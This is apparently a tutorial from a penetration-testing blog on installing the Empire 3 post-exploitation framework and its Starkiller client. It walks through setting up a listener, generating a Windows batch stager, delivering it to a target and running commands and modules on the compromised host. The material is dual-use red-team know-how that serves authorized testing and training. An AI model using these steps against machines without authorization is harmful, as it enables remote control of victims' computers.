Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent, and compatibility with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and flexible architecture.
Documentation
GitHub: https://github.com/BC-SECURITY/Empire
Client: https://github.com/BC-SECURITY/Starkiller
Installation
Server
1. Download the Github repository into the server, and run the installation script
- git clone https://github.com/BC-SECURITY/Empire.git
- cd Empire
- sudo ./setup/install.sh
(OPTIONAL) You need to install the requirements, in this case I got those already, that is within Empire/setup
- sudo pip3 install -r requirements.txt
2. You will be prompted to enter a password, this time I will use Pass123
- Pass123
3. After that the installation completes for the server.
4. We now need to start the service, within Empire directory
- sudo ./empire –rest –username vk9sec –password Pass12345
Client
On the client we need StarKiller to access Empire
1. Download the client app
- sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.3.2/starkiller-1.3.2.AppImage
2. change file permissions, add execute
- sudo chmod +x starkiller-1.3.2.AppImage
- ls -l starkiller-1.3.2.AppImage
3. Run the application
- ./starkiller-1.3.2.AppImage –no-sandbox
4. Now connect to Empire C2 server by using the credentials created at run time and the Server IP (./empire –rest –username vk9sec –password Pass12345)
- URL https://192.168.0.21:1337
- Username vk9sec
- Password Pass12345
How to use Starkiller
1. In the left you can see the menu
Each option contains its data, first we need to start a listener, then run the stager, and have it executed at the target machine.
2. Create a Listener (Any active listeners will be displayed)
- Click on Listeners
- Create listener
3. You can choose one of multiple types of listeners, in this case I would use http, and fill some info, the rest I leave it as default.
- Name: test_listener
- Host: http:192.168.0.21:443
- Port: 443
- Click on submit (at the bottom)
4. I go back to the Listeners page; I can see now the listener created
5. Now that we have the Listener we need to generate a stager, so we go to Stagers
- Click on Stagers
- Generate Stager
6. We need to choose the type of stager; I’d choose this time Windows/launcher_bat
- Type: windows/launcher_bat
- Listener: test_listener
- Language: Powershell
- (OPTIONAL) optional fields (I leave them as default)
- Click on Submit
7. Visit the stagers main page, and you will see it listed
- Stagers
8. You can Download it, under “Actions”, then, you can deliver it via your preferred method.
- Click on Download icon
9. Once, executed on the target machine, the connection will be listed under “Agents”
- Agents
10. You need to Select the session you want to work on
11. Within that session, we can execute system commands
- Shell Command: dir
12. You can also, run modules
- Execute Module: powershell/trollsploit/message
13. You can modify the contents of the payload
14. Execute it, then the victim would get a pop message like this
- Submit
15. Under “Modules”, you can find all the modules contained and see a description
16. If you click on the play icon under “Actions”, you can execute the module
- Choose the session name
17. Click on submit
18. Under Reporting, you can find the history of commands